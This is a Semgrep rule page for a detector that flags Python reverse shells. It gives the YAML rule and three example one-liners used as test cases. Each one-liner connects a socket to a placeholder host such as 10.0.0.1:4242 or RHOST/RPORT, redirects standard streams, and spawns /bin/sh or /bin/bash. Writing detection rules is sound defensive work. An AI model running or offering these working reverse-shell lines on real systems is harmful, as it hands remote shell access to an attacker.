python.lang.security.audit.python-reverse-shell.python-reverse-shell

profile photo of returntocorpreturntocorp
Author
unknown
Download Count*
LGPL Commons Clause
License

Semgrep found a Python reverse shell using $BINPATH to $IP at $PORT

Run Locally

Run in CI

Semgrep CI docs

Defintion

Edit RuleView Source
Open in Playground 
rules:
  - id: python-reverse-shell
    patterns:
      - pattern-either:
          - pattern: pty.spawn("$BINPATH",...)
          - pattern: subprocess.call(["$BINPATH",...],...)
      - metavariable-regex:
          metavariable: $BINPATH
          regex: /bin/.*?sh\b
      - pattern-inside: |
          import socket
          ...
          $S = socket.socket(...)
          ...
          $S.connect(($IP,$PORT),...)
          ...
    message: Semgrep found a Python reverse shell using $BINPATH to $IP at $PORT
    metadata:
      cwe:
        - "CWE-553: Command Shell in Externally Accessible Directory"
      category: security
      technology:
        - python
      references:
        - https://cwe.mitre.org/data/definitions/553.html
      subcategory:
        - audit
      likelihood: LOW
      impact: MEDIUM
      confidence: LOW
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
    languages:
      - python
    severity: WARNING

Examples

python-reverse-shell.py

# ruleid: python-reverse-shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

# ruleid: python-reverse-shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

# ruleid: python-reverse-shell
import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")